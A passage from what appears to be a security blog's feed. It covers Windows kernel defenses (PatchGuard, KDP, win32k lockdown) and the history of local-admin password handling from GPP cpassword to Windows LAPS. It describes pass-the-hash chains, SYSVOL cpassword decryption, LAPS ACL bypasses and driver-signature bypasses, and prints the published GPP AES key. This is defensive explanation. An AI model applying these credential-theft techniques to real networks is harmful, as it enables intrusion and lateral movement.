    &quot;SecurityServicesRunning&quot;: [1, 2, 7],
    &quot;AvailableSecurityProperties&quot;: [1, 2, 3, 5, 7],
}&lt;/p&gt;
&lt;p&gt;print(&quot;Win32_DeviceGuard decoded:&quot;)
decode(&quot;VirtualizationBasedSecurityStatus&quot;,
       sample[&quot;VirtualizationBasedSecurityStatus&quot;], VBS_STATUS)
decode(&quot;SecurityServicesRunning&quot;,
       sample[&quot;SecurityServicesRunning&quot;], SECURITY_SERVICES)
decode(&quot;AvailableSecurityProperties&quot;,
       sample[&quot;AvailableSecurityProperties&quot;], AVAILABLE_PROPERTIES)
`}&lt;/p&gt;
&lt;h3&gt;Common pitfalls&lt;/h3&gt;
&lt;p&gt;A short reference list of mistakes that recur in real-world reviews:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Apply mitigations at &lt;code&gt;CreateProcess&lt;/code&gt;, not at runtime.&lt;/strong&gt; The Forshaw / Fratric race is the cited example [@pz-breaking-chain].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Do not assume &lt;code&gt;DisallowWin32kSystemCalls&lt;/code&gt; is the modern lockdown.&lt;/strong&gt; It is the Windows 8 ancestor of &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; and is structurally distinct -- different mitigation enum, different policy struct [@ms-syscall-disable-policy] [@ms-syscall-filter-policy].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Do not use &lt;code&gt;MmAllocateNodePagesForMdlEx&lt;/code&gt; for Dynamic KDP.&lt;/strong&gt; The canonical API is &lt;code&gt;ExAllocatePool3&lt;/code&gt; with the secure-pool extended parameter; the NUMA-MDL API is a different API for a different purpose [@ms-kdp-blog].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;kCET disables system-wide on a non-&lt;code&gt;/CETCOMPAT&lt;/code&gt; driver.&lt;/strong&gt; A single non-compat driver in the inbox set turns it off [@ms-kernel-mode-hsp].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;PatchGuard is not a security boundary.&lt;/strong&gt; Do not architect a defense whose security argument rests on it; Microsoft&apos;s own Servicing Criteria say so [@ms-servicing-criteria].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;None of these decisions makes the kernel a security boundary; together they make the kernel as hard to defeat as today&apos;s stack allows. The remaining questions are FAQs.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;

No. Microsoft&apos;s own *Security Servicing Criteria for Windows* explicitly does not enumerate admin-to-kernel or kernel-to-kernel as a security boundary; PatchGuard is an *engineering deterrent*, not a security boundary [@ms-servicing-criteria]. The most empirically grounded refutation is Uroburos&apos;s 2011 -- 2014 operational coexistence with PatchGuard on production Windows systems [@gdata-uroburos-blog]. PatchGuard raises the cost of a class of attacks; it does not eliminate any class of attacks.

No. PatchGuard shipped on April 25, 2005, with Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition [@ms-advisory-932596]. Vista x64 (November 2006) inherited PatchGuard v2 from the 2005 release; the x86 editions of Vista never received PatchGuard. The &quot;Vista first&quot; misreading conflates PatchGuard&apos;s first widely-publicised release with its first shipping release.

No. Uroburos was a Driver Signature Enforcement (DSE) bypass that coexisted with PatchGuard for three years (2011 -- 2014) without modifying any PatchGuard-protected structure. It loaded a signed-but-vulnerable copy of Oracle&apos;s `VBoxDrv.sys`, used the vulnerability to flip the `g_CiEnabled` DSE-gating flag, loaded its own unsigned rootkit driver, then operated alongside PatchGuard [@gdata-uroburos-blog] [@stmxcsr-turla]. The canonical PatchGuard *bypass* is GhostHook (Kasif Dekel, CyberArk, June 2017), which uses an Intel-PT-buffer-fill PMI to redirect execution without touching any structure PatchGuard enumerates [@cyberark-ghosthook].

No. They are distinct `SetProcessMitigationPolicy` enums with distinct semantics. `DisallowWin32kSystemCalls` shipped in Windows 8 (2012) as a `PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY` and is all-or-nothing [@ms-syscall-disable-policy]. `Win32kSystemCallFilter` shipped in Windows 10 1709 (October 2017) as a `PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY` and is a per-syscall allow-list driven by a bitmap of system-defined `FilterId` values [@ms-syscall-filter-policy]. Chromium uses *both* in different process types -- the blanket-disable for processes that need no UI, the per-syscall filter for the renderer [@chromium-sandbox-doc].

Microsoft&apos;s documentation still calls it an x64 feature [@ms-driver-x64-restrictions], but in deployment it is also enforced on 64-bit ARM Windows in 2026. It has never shipped on x86 -- the precise framing is &quot;64-bit Windows only, both x64 and ARM64.&quot; The &quot;x64 only&quot; framing is documentation-accurate but deployment-incomplete.

Mostly no. KDP is a VBS-backed (Secure Kernel / VTL1) mitigation that *protects* kernel memory but is *enforced* outside the kernel. The Microsoft launch blog states the architecture directly: &quot;the memory managed by KDP is always verified by the secure kernel (VTL1) and protected using SLAT tables by the hypervisor&quot; [@ms-kdp-blog]. KDP is the canonical example of the same-privilege paradox resolved by structural means: the enforcement lives at a privilege level the VTL0 attacker cannot reach.

Title hyperbole, time-scoped. Pre-lockdown, win32k was the dominant Windows kernel LPE subsystem -- Stuxnet 2010 used a `win32k.sys` keyboard-layout LPE [@nvd-cve-2010-2743]; Bochspwn 2013 documented the systemic shape [@j00ru-bochspwn-blog]; Forshaw reports that Chrome&apos;s M54 win32k lockdown &quot;blocked the sandbox escape of an exploit chain being used in the wild&quot; [@pz-breaking-chain]. Elastic Security Labs&apos; 2024 in-the-wild survey continues to name win32k among the recurring subsystems [@elastic-lpe-survey]. The lockdown removed roughly half the historically-vulnerable syscall surface *from sandboxed renderers specifically* -- both the fraction and the scope are time- and context-bounded.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; PatchGuard, KASLR, KDP, &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; -- four answers, twenty-one years, one paradox. The arc resolves: every meaningful kernel defense in modern Windows ultimately lives at a privilege level the attacker does not have, because the alternative -- defending the kernel from inside the kernel -- is the one thing the architecture cannot do.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;kernel-self-defense-in-windows-patchguard-kaslr-kdp-and-the-win32k-lockdown-that&quot; keyTerms={[
  { term: &quot;Same-Privilege Paradox&quot;, definition: &quot;A defense at the attacker&apos;s privilege level cannot in principle succeed; the de facto design constraint Microsoft has acknowledged in writing through the Security Servicing Criteria.&quot; },
  { term: &quot;PatchGuard (KPP)&quot;, definition: &quot;Microsoft kernel feature that periodically verifies a fixed list of kernel structures and bug-checks the system on mismatch with stop code 0x109; not a security boundary.&quot; },
  { term: &quot;SSDT&quot;, definition: &quot;System Service Descriptor Table; the kernel function-pointer table that dispatches system calls. Pre-PatchGuard, the canonical AV hooking surface; post-PatchGuard, a protected structure.&quot; },
  { term: &quot;KMCS&quot;, definition: &quot;Kernel-Mode Code Signing; the 64-bit Windows policy that the kernel will load only Authenticode-signed drivers in production.&quot; },
  { term: &quot;CRITICAL_STRUCTURE_CORRUPTION (0x109)&quot;, definition: &quot;The bug-check stop code PatchGuard raises on detecting an unexpected modification to a protected kernel structure.&quot; },
  { term: &quot;KASLR&quot;, definition: &quot;Kernel Address Space Layout Randomisation; probabilistic defense by randomising kernel base address; defeated by side-channel attackers on systems with shared TLB/cache state.&quot; },
  { term: &quot;DSE&quot;, definition: &quot;Driver Signature Enforcement; the policy gate that loads only signed drivers in production. The g_CiEnabled flag is the in-memory gate; flipping it is the canonical BYOVD operation.&quot; },
  { term: &quot;Win32kSystemCallFilter&quot;, definition: &quot;Windows 10 1709+ process-mitigation policy registering a per-process allow-list of win32k system calls; the canonical &apos;attack-surface deletion&apos; mitigation.&quot; },
  { term: &quot;KAISER / KPTI&quot;, definition: &quot;Kernel Page-Table Isolation; the two-CR3 page-table architecture that makes the kernel address space unreachable from user CR3; Linux shipped KPTI in 2018, Microsoft shipped KVA Shadow.&quot; },
  { term: &quot;LPAC&quot;, definition: &quot;Less Privileged AppContainer; a Windows process model that further restricts ambient capabilities. Used by the Chromium renderer in composition with Win32kSystemCallFilter.&quot; },
  { term: &quot;KDP&quot;, definition: &quot;Kernel Data Protection; static via MmProtectDriverSection, dynamic via ExAllocatePool3 with POOL_EXTENDED_PARAMS_SECURE_POOL. Enforced by the Secure Kernel (VTL1) via SLAT.&quot; },
  { term: &quot;VBS / VTL1&quot;, definition: &quot;Virtualization-Based Security; the hypervisor-partitioned architecture in which a Secure Kernel runs at Virtual Trust Level 1, above the NT kernel in VTL0.&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring-Your-Own-Vulnerable-Driver; the dominant 2026 attacker pattern of installing a signed third-party driver with a kernel-write primitive to obtain arbitrary kernel-mode access.&quot; },
  { term: &quot;KTRR&quot;, definition: &quot;Kernel Text Read-only Region; Apple Silicon&apos;s hardware-enforced read-only kernel text region, locked at boot at the AMCC memory-controller level.&quot; },
  { term: &quot;Reference Monitor (Anderson 1972)&quot;, definition: &quot;The formal anchor for the same-privilege paradox: a security policy must be enforced by a monitor that is always invoked, tamper-resistant from its subjects, and small enough to be analysed.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-Protected Code Integrity; the VTL1-anchored W^X enforcement for kernel pages that underpins KDP, kCFG, and kCET.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-internals</category><category>kernel-security</category><category>patchguard</category><category>kaslr</category><category>kdp</category><category>win32k-lockdown</category><category>vbs-hvci</category><category>same-privilege-paradox</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Twenty-Year Local Admin Password Crisis: From GPP cpassword to Windows LAPS</title><link>https://paragmali.com/blog/the-twenty-year-local-admin-password-crisis-from-gpp-cpasswo/</link><guid isPermaLink="true">https://paragmali.com/blog/the-twenty-year-local-admin-password-crisis-from-gpp-cpasswo/</guid><description>Microsoft published the AES key that &quot;protected&quot; Group Policy Preferences passwords. Twelve years later, MS14-025 still has not deleted the artefacts. Here is how Windows LAPS finally fixed the architecture -- and what it still cannot solve.</description><pubDate>Wed, 03 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
**Eleven years separated Microsoft&apos;s December 2012 architectural articulation of the shared-local-admin problem from the April 11, 2023 in-box default.** Group Policy Preferences &quot;encrypted&quot; the local Administrator password with an AES key Microsoft published in its own protocol specification (2008-2014). MS14-025 disabled new authoring but deleted no SYSVOL artefacts (2014). Legacy LAPS shipped as a separate MSI with plaintext in `ms-Mcs-AdmPwd` (2015-2023). In-box Windows LAPS finally added CNG DPAPI encryption-at-rest, Microsoft Entra ID backup, and post-authentication rotation. The 2026 default is `BackupDirectory = 2` (AD) or `1` (Entra), `PasswordAgeDays` \&amp;lt;= 30, `ADPasswordEncryptionEnabled` left at its default `True` (the failure mode is silent fallback to plaintext when the domain functional level is below Windows Server 2016, not an off-by-default bit), `ADPasswordEncryptionPrincipal` overridden to a dedicated decryptor group, and `PostAuthenticationActions` left at default `3` (reset + sign out). The residual attack surface is delegated-decryptor compromise, the screenshotted-password OPSEC tail, unmanaged BYOD endpoints, and the multi-decade tail of un-cleaned SYSVOL `cpassword` XMLs that MS14-025 never deleted.
&lt;h2&gt;1. One Password, Fifty Thousand Laptops&lt;/h2&gt;
&lt;p&gt;In May 2012, a domain user with twelve lines of PowerShell could read the local Administrator password for every machine in the organisation. The tool was &lt;code&gt;Get-GPPPassword.ps1&lt;/code&gt; [@obscuresec-gpp-2012]. The &quot;encryption&quot; was AES-256-CBC with a 32-byte key Microsoft had published in its own protocol specification [@ms-gppref-aes-key] -- not leaked, &lt;em&gt;published&lt;/em&gt;, as a feature, so that third-party Group Policy implementations could read the format. Eleven years later, on April 11, 2023, Microsoft finally shipped the in-box fix [@tc-windows-laps-ga-2023].&lt;/p&gt;
&lt;p&gt;This is an article about those eleven years.&lt;/p&gt;

A lateral-movement technique in which an attacker uses the NTLM hash of a captured password directly in an authentication exchange, without recovering the cleartext. If the same local Administrator password is reused across a fleet, one dumped hash unlocks every machine. MITRE catalogues the technique as **T1550.002**.
&lt;p&gt;The pattern was old before 2012. Through the 2000s, the only practical way to provision the local Administrator account on a Windows fleet was to bake one shared password into the reference image and ship the image to every endpoint. Helpdesk knew the password. Pentesters guessed at it. And once Benjamin Delpy&apos;s Mimikatz had pulled the hash from a single phished workstation in 2011, the rest of the org fell to a single &lt;code&gt;psexec&lt;/code&gt; spray. Microsoft documented the threat model precisely in its December 2012 &lt;em&gt;Mitigating Pass-the-Hash&lt;/em&gt; whitepaper [@ms-pth-whitepaper], which named the shared local Administrator credential as the architectural enabler of the entire intrusion class [@mitre-t1550-002].&lt;/p&gt;
&lt;p&gt;Microsoft also had a &lt;em&gt;fix&lt;/em&gt;. It had shipped one in 2008 with Group Policy Preferences (GPP), the feature that could push a per-machine local-admin password from a Group Policy Object to every endpoint. GPP put the password in an XML file in SYSVOL. SYSVOL was world-readable to every authenticated user in the domain. Microsoft encrypted the password with AES-256-CBC -- and then published the key. The result, after a four-author weaponisation chain in mid-2012 [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp], was that GPP made the original problem &lt;em&gt;worse&lt;/em&gt;: instead of one shared password recoverable by physical access to a help-desk laptop, it was now one shared password recoverable by any authenticated domain user with a copy of &lt;code&gt;Get-GPPPassword.ps1&lt;/code&gt;. Microsoft &quot;patched&quot; it on May 13, 2014 with MS14-025 [@ms14-025-bulletin], which disabled new authoring but deleted nothing already deployed. Twelve years later, PingCastle still finds the artefacts in production AD [@pingcastle-rules].&lt;/p&gt;
&lt;p&gt;The first real fix was Generation 2: the legacy Microsoft LAPS, shipped May 1, 2015 as a separate MSI [@ms-advisory-3062591-wayback]. It stored a per-machine random password in the &lt;code&gt;ms-Mcs-AdmPwd&lt;/code&gt; attribute on the computer object, marked CONFIDENTIAL [@adsec-laps-2016]. The directory-side ACL was tighter than SYSVOL, but the deployment surface (install on every endpoint, extend the schema, delegate the OU) capped its real coverage; the password sat in plaintext in AD, one DCSync from &quot;plaintext everywhere&quot;; and a delegation pattern that helpdesks regularly issued -- &quot;All Extended Rights&quot; on the computer OU -- silently included read access to the CONFIDENTIAL attribute [@adsec-laps-2016]. SpecterOps modelled that bypass as the &lt;code&gt;ReadLAPSPassword&lt;/code&gt; BloodHound edge on August 7, 2018 [@specterops-bh2].&lt;/p&gt;
&lt;p&gt;Generation 3 -- Windows LAPS, in-box, no MSI -- shipped on Patch Tuesday April 11, 2023 [@tc-windows-laps-ga-2023] across Windows 11 22H2 and 21H2, Windows 10 22H2, Windows Server 2022, Windows Server 2019, and Windows Server Annual Channel. Windows Server 2016 was explicitly excluded [@ms-laps-overview]. The new architecture wrapped the password with CNG DPAPI&apos;s group key-protector against a configurable principal, exposed Microsoft Entra ID as a peer backup directory [@tc-entra-laps-ga-2023], and added a post-authentication rotation primitive that closed the screenshotted-password OPSEC tail on the &lt;em&gt;next&lt;/em&gt; managed-account logon [@ms-laps-policy-settings].&lt;/p&gt;
&lt;p&gt;The local Administrator account always has the well-known &lt;strong&gt;relative identifier (RID) 500&lt;/strong&gt; in the machine&apos;s SAM, irrespective of any administrative renaming. Renaming the account at the friendly-name level does not change its SID, which is why Windows LAPS resolves the target account by SID and not by name -- and why an empty &lt;code&gt;AdministratorAccountName&lt;/code&gt; policy still finds the right account even on a renamed-built-in host.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Microsoft knew the right architecture for managing local Administrator passwords in December 2012, when its own Pass-the-Hash whitepaper named the shared-credential pattern as the architectural enabler of lateral movement. It took until April 11, 2023 to ship that architecture as a Windows default. Eleven years is a long time. The intervening generations each solved part of the previous problem and introduced a new one. The 2026 baseline is, for the first time, an OS-default solution rather than an out-of-band one -- and for the first time, the residual attack surface is the actual surface rather than an artefact of incomplete shipping.&lt;/p&gt;
&lt;/blockquote&gt;

gantt
    dateFormat YYYY-MM-DD
    axisFormat %Y
    title Local-administrator password management on Windows, 1998-2026&lt;pre&gt;&lt;code&gt;section Generation 0 -- Imaged-build era
Shared local admin password baked into image          :gen0, 1998-01-01, 2008-02-26

section Generation 1 -- GPP cpassword
Group Policy Preferences ships in WS2008 RTM           :g1a, 2008-02-27, 2014-05-12
Linda Moore re-posts &quot;Passwords in GPP (Updated)&quot;     :milestone, 2009-04-22, 1d
Sogeti / obscuresec / rewtdance / Metasploit chain    :crit, 2012-04-01, 2012-07-31
MS PtH whitepaper v1 (architecture articulated)       :milestone, 2012-12-01, 1d
MS14-025 disables new authoring (no remediation)      :milestone, 2014-05-13, 1d

section Generation 2 -- Legacy MSI LAPS
Microsoft LAPS GA (KB3062591 MSI)                      :g2a, 2015-05-01, 2023-04-10
Metcalf publishes All-Extended-Rights bypass           :milestone, 2016-08-01, 1d
SpecterOps BloodHound 2.0 ships ReadLAPSPassword edge :milestone, 2018-08-07, 1d

section Generation 3 -- In-box Windows LAPS
Windows LAPS ships in-box (AD backup)                  :crit, 2023-04-11, 2026-12-31
Windows LAPS with Entra ID GA                          :milestone, 2023-10-23, 1d
Win 11 24H2 passphrases and Automatic Account Mgmt    :milestone, 2024-10-01, 1d
Win 11 25H2 Administrator Protection (orthogonal)     :milestone, 2025-11-19, 1d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The article that follows traces the architecture of each generation, the attacks each one solved and each one enabled, and what &quot;standard local admin password management&quot; looks like as a 2026 default. To see why this took twenty years, we have to start in 1998, before Active Directory.&lt;/p&gt;
&lt;h2&gt;2. Origins: Why Every Workstation Had the Same Local-Admin Password (1998-2008)&lt;/h2&gt;
&lt;p&gt;Picture a system administrator in 2005. They are holding a CD-R labelled &lt;code&gt;Win-Build-7.iso&lt;/code&gt; and a sticky note with a 12-character password. Those two artefacts are the entire local-Administrator-credential lifecycle for ten thousand desktops. The CD will be cloned to a USB drive, the USB drive will reseed Norton Ghost, and Ghost will paint the build onto every new workstation the company buys for the next eight months. Each painted machine will boot with the sticky-note password as its built-in local Administrator. Helpdesk knows the password because they typed it into the image. Five hundred field technicians know the password because they have to be able to recover unmanaged laptops off-network. The pentester who shows up in March will know the password by Tuesday lunch.&lt;/p&gt;
&lt;p&gt;This was not a deviation. It was the architecture.&lt;/p&gt;

Every Windows machine ships with a built-in local Administrator account whose security identifier ends in the **relative identifier 500**. The RID is constant across machines, languages, and SKUs. Renaming the account changes the friendly name but not the RID, so identity-aware tooling (including Windows LAPS) resolves the account by SID rather than by name. Disabling the account is a configuration choice, not a deletion: the account remains in SAM and can be re-enabled at any time.
&lt;p&gt;The mechanics were a function of how Windows was deployed at scale. Microsoft Sysprep &lt;code&gt;/generalize&lt;/code&gt; strips a reference image&apos;s machine SID before duplication, but it leaves the SAM intact. Whatever local Administrator password sits in the reference image is the local Administrator password on every endpoint painted from that image. Imaging pipelines were built around this: Norton Ghost in the late 1990s, Microsoft Deployment Toolkit (MDT) and later System Center Configuration Manager Operating System Deployment in the 2000s, all assumed the same SAM. Sean Metcalf&apos;s December 2015 SYSVOL retrospective walks the era end-to-end and explains why every shop in the world ended up with a single password [@adsec-gpp-2015].&lt;/p&gt;
&lt;p&gt;The operational reality kept the pattern alive. Help-desk needed &lt;em&gt;one&lt;/em&gt; known credential to break-glass a laptop that had wandered off the corporate network for six months. Field technicians needed &lt;em&gt;one&lt;/em&gt; known credential to swap a failed hard drive on a roof-top kiosk in Houston without phoning home. A known-to-the-org local-admin password was the only realistic fallback path, and the alternative -- a different password per machine, stored somewhere retrievable -- required a &lt;em&gt;retrieval&lt;/em&gt; primitive Microsoft had not yet shipped.&lt;/p&gt;
&lt;p&gt;The threat model that made the trade-off catastrophic did not get articulated by Microsoft itself until December 2012, in version 1 of the Pass-the-Hash whitepaper [@ms-pth-whitepaper]. The chain was already common knowledge in offensive-security circles: phish a single user, run Benjamin Delpy&apos;s 2011-vintage Mimikatz to pull credentials from LSASS, capture the NT hash of the built-in &lt;code&gt;Administrator&lt;/code&gt; account, replay that hash to every other host via &lt;code&gt;psexec&lt;/code&gt; or &lt;code&gt;wmiexec&lt;/code&gt;, and pivot up to the first server an enterprise admin has touched. MITRE catalogues the default-account abuse as &lt;strong&gt;T1078.001&lt;/strong&gt; [@mitre-t1078-001] and the hash-replay step as &lt;strong&gt;T1550.002&lt;/strong&gt; [@mitre-t1550-002]. The whitepaper&apos;s recommended controls included exactly the architecture Microsoft would eventually ship as LAPS: per-machine random local-admin passwords, rotated frequently, retrievable only by an authorised principal.&lt;/p&gt;

The hard part was never the cryptography. It was the operations. A pre-2008 sysadmin who proposed &quot;let&apos;s give every workstation a random local-Administrator password&quot; was correctly told that the answer required, at minimum, a directory-scoped retrieval primitive that did not exist; an ACL model that could distinguish &quot;help-desk can read this for their own OU&quot; from &quot;any authenticated user can read this for the whole forest&quot;; and a rotation pipeline that did not depend on the workstation being on the corporate network. Microsoft would not ship those primitives until 2008 (GPP, badly), 2015 (legacy LAPS, well), and 2023 (Windows LAPS, with encryption-at-rest). Until then, &quot;do not get compromised&quot; was the entire mitigation.
&lt;p&gt;The third-party prehistory matters because it set the terms Microsoft would eventually use. PolicyMaker, the engineering parent of what became Group Policy Preferences, was a product of DesktopStandard Corporation that Microsoft acquired in October 2006 [@adsec-gpp-2015]. Thycotic was founded in 1996 by Jonathan Cogley and shipped its Secret Server vault from the mid-2000s [@kuppingercole-cogley]; Lieberman Software (later acquired by Bomgar in January 2018) had operated as Lieberman and Associates since 1978 [@wikipedia-lieberman]; Quest Software was founded in 1987 in Newport Beach, California and was a public company well before the mid-2000s LAPS prehistory began -- its August 14, 1999 NASDAQ IPO saw its shares surge to $47 in a single Wall Street session [@wikipedia-quest; @latimes-quest-ipo-1999]. None of those vendors solved the local-admin-on-every-Windows-machine problem from inside the OS, and Microsoft&apos;s own first-party tooling -- restricted groups, logon scripts, Group Policy Object security templates -- offered no rotation primitive at all. The gap was not a knowledge gap; it was a &lt;em&gt;first-party-feature&lt;/em&gt; gap.&lt;/p&gt;
&lt;p&gt;In February 2008, Microsoft shipped Windows Server 2008. With it came Group Policy Preferences -- and with GPP came a &quot;Local Users and Groups&quot; preference that could push a per-machine local-admin password from a domain GPO to every endpoint in scope. It was the first first-party rotation mechanism Microsoft had ever shipped. It made the problem dramatically worse.&lt;/p&gt;
&lt;h2&gt;3. Decoration Is Not Encryption: GPP cpassword (2008-2012)&lt;/h2&gt;
&lt;p&gt;Microsoft Server 2008 reached release-to-manufacturing in February 2008. Group Policy Preferences shipped with it. The new &quot;Local Users and Groups&quot; preference -- alongside Scheduled Tasks, Services, Data Sources, Drive Maps, and Printers -- could push a password from a GPO down to every endpoint in scope. The password went into an XML file in SYSVOL, the domain&apos;s replicated policy share. SYSVOL was world-readable to every authenticated user in the domain. The password was AES-256-CBC encrypted in the XML, in a field called &lt;code&gt;cpassword&lt;/code&gt;. The key was a 32-byte value published in &lt;code&gt;[MS-GPPREF]&lt;/code&gt; section 2.2.1.1.4 [@ms-gppref-aes-key], in Microsoft&apos;s own Open Specifications protocol corpus -- &lt;em&gt;as a feature&lt;/em&gt;, so that third-party Group Policy implementations could interoperate.&lt;/p&gt;

A file share replicated to every Domain Controller in an Active Directory domain, used to distribute Group Policy templates and logon scripts. The default share permissions allow **Read** access to every Authenticated User in the forest. Any file placed in SYSVOL is, operationally, readable by every domain user.

The XML attribute defined by `[MS-GPPREF]` that carries an encrypted password inside a Group Policy Preferences item. The encryption is AES-256-CBC with a 16-byte zero IV and a static 32-byte key published in the same protocol specification. The name is short for &quot;ciphertext password&quot; and was the canonical search term for finding deployed credentials in SYSVOL between 2012 and 2026.

A loadable component on each Windows endpoint that processes one class of Group Policy setting. Each preference type (Local Users and Groups, Scheduled Tasks, Services, etc.) is implemented by its own CSE, which runs during the Group Policy refresh cycle. CSEs read the policy XML out of SYSVOL, decrypt any `cpassword` field locally, and apply the setting to the host.
&lt;p&gt;Microsoft was not unaware. On April 22, 2009, the Group Policy Team blog re-posted (and updated) a piece by Linda Moore titled &lt;em&gt;&quot;Passwords in Group Policy Preferences (Updated)&quot;&lt;/em&gt; [@ms-gp-blog-grouppolicy-2009-wayback]. The phrasing is unambiguous.&lt;/p&gt;

the password is not secured. Because the password is stored in SYSVOL, all authenticated users have read access to it. -- Linda Moore, Group Policy Team blog, April 22, 2009 [@ms-gp-blog-grouppolicy-2009-wayback]
&lt;p&gt;The post recommended a list of mitigations: prefer secure mechanisms, audit who can read the SYSVOL share, prefer not to use the field at all. None of those mitigations could rotate the key. None could revoke the &lt;em&gt;static AES-256 key value&lt;/em&gt; published in &lt;code&gt;[MS-GPPREF]&lt;/code&gt;. Microsoft was telling its customers, in 2009, three years and eight months before the public weaponisation, that the credential they were storing was decryptable by every user in the domain by design.&lt;/p&gt;
&lt;p&gt;Three years later, the offensive-security community spent twelve weeks turning the publication into a default-on red-team primitive.&lt;/p&gt;
&lt;p&gt;In April and May of 2012, Emilien Girault of Sogeti ESEC published a Python decryptor on the firm&apos;s research blog [@sogeti-2012-wayback]. The site has since been retired and the canonical reference is the Wayback Machine capture. In mid-May 2012, Chris Campbell (@obscuresec) published &lt;code&gt;Get-GPPPassword.ps1&lt;/code&gt;, a PowerShell port that fetched the relevant XML from SYSVOL, decoded the base64, and called .NET&apos;s AES primitives with the published key [@obscuresec-gpp-2012]. The script was folded into PowerSploit at &lt;code&gt;Exfiltration/Get-GPPPassword.ps1&lt;/code&gt;, where its header still reads &lt;em&gt;&quot;Author: Chris Campbell (@obscuresec)&quot;&lt;/em&gt; [@powersploit-getgpppwd] and explicitly credits Emilien Girault for the underlying research. In June 2012, &lt;strong&gt;Ben Campbell&lt;/strong&gt; (the &lt;code&gt;rewtdance.blogspot.com&lt;/code&gt; blog handle), working with &lt;code&gt;scriptmonkey&lt;/code&gt; (a named collaborator with his own blog at &lt;code&gt;blog.owobble.co.uk&lt;/code&gt;), extended the attack to &lt;em&gt;all six&lt;/em&gt; XML wire-format carriers that &lt;code&gt;[MS-GPPREF]&lt;/code&gt; permits [@rewtdance-gpp-2012]. The rewtdance post body credits the collaboration verbatim: &lt;em&gt;&quot;Working with scriptmonkey (&lt;a href=&quot;http://blog.owobble.co.uk/&quot; rel=&quot;noopener&quot;&gt;http://blog.owobble.co.uk/&lt;/a&gt;), who already had a DC configured, we verified this theory.&quot;&lt;/em&gt; On July 25, 2012, the Metasploit module &lt;code&gt;post/windows/gather/credentials/gpp.rb&lt;/code&gt; landed [@metasploit-gpp] with five co-authors: Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix. A companion auxiliary scanner, &lt;code&gt;auxiliary/scanner/smb/smb_enum_gpp.rb&lt;/code&gt;, was authored independently by Joshua D. Abraham of Praetorian [@metasploit-smb-enum-gpp].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A widespread folk attribution credits &lt;code&gt;Get-GPPPassword.ps1&lt;/code&gt; to &quot;scriptjunkie.&quot; The primary sources do not support that claim. The PowerSploit script header credits Chris Campbell (@obscuresec) [@powersploit-getgpppwd]; the rewtdance June 2012 follow-up is by Ben Campbell with scriptmonkey as a named collaborator (scriptmonkey blogs at &lt;code&gt;blog.owobble.co.uk&lt;/code&gt;, not at rewtdance) [@rewtdance-gpp-2012]; the Metasploit &lt;code&gt;gpp.rb&lt;/code&gt; module&apos;s author field names Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix [@metasploit-gpp]; and the &lt;code&gt;smb_enum_gpp&lt;/code&gt; scanner is by Joshua D. Abraham [@metasploit-smb-enum-gpp]. No primary source ties &quot;scriptjunkie&quot; (Matt Weeks) to the GPP cpassword research chain at all. The names are similar; the people are different.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The whole exercise was twelve lines of code. The interesting part was not the cryptography. The interesting part was that the operation was &lt;em&gt;decryption-by-reference&lt;/em&gt;: with a published key, the AES envelope was not protecting a secret, it was carrying a secret in a format the protocol specification told everyone how to read.&lt;/p&gt;

```
4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
```
These bytes are reproduced verbatim from Microsoft&apos;s published `[MS-GPPREF]` Group Policy Preferences specification [@ms-gppref-aes-key]. They have appeared in the public Microsoft Open Specifications corpus since the `[MS-GPPREF]` protocol document was first published as part of the Windows Server 2008 protocol-documentation programme; the earliest tangible third-party reuse of the key dates to the April-July 2012 Sogeti / obscuresec / rewtdance / Metasploit research chain [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp]. The key is *not* a secret; it is an interoperability primitive.
&lt;p&gt;{`&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ReadSucceeds[&quot;Read succeeds (silent CONTROL_ACCESS bypass)&quot;]
ReadFails[&quot;Read fails (correctly ACL-gated)&quot;]
Endpoint --&amp;gt; GPRefresh
GPRefresh --&amp;gt; Rotate
Rotate --&amp;gt; SAMWrite
Rotate --&amp;gt; ADWrite
ADWrite --&amp;gt; LDAPRead
LDAPRead --&amp;gt; Bypass
Bypass -- yes --&amp;gt; ReadSucceeds
Bypass -- no --&amp;gt; ReadFails
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The other structural limit was the directory&apos;s own integrity boundary. The password sat in plaintext in the directory. A stolen &lt;code&gt;NTDS.dit&lt;/code&gt; -- obtained via DCSync, NTDSUtil dump, or physical theft of a DC&apos;s disk -- exposed every managed local-Administrator password in the forest at once. There was no encryption-at-rest in legacy LAPS, by design. The trust model was &quot;the directory is tier 0 and DCSync is a domain-compromise event already,&quot; which is operationally true and architecturally lazy.&lt;/p&gt;
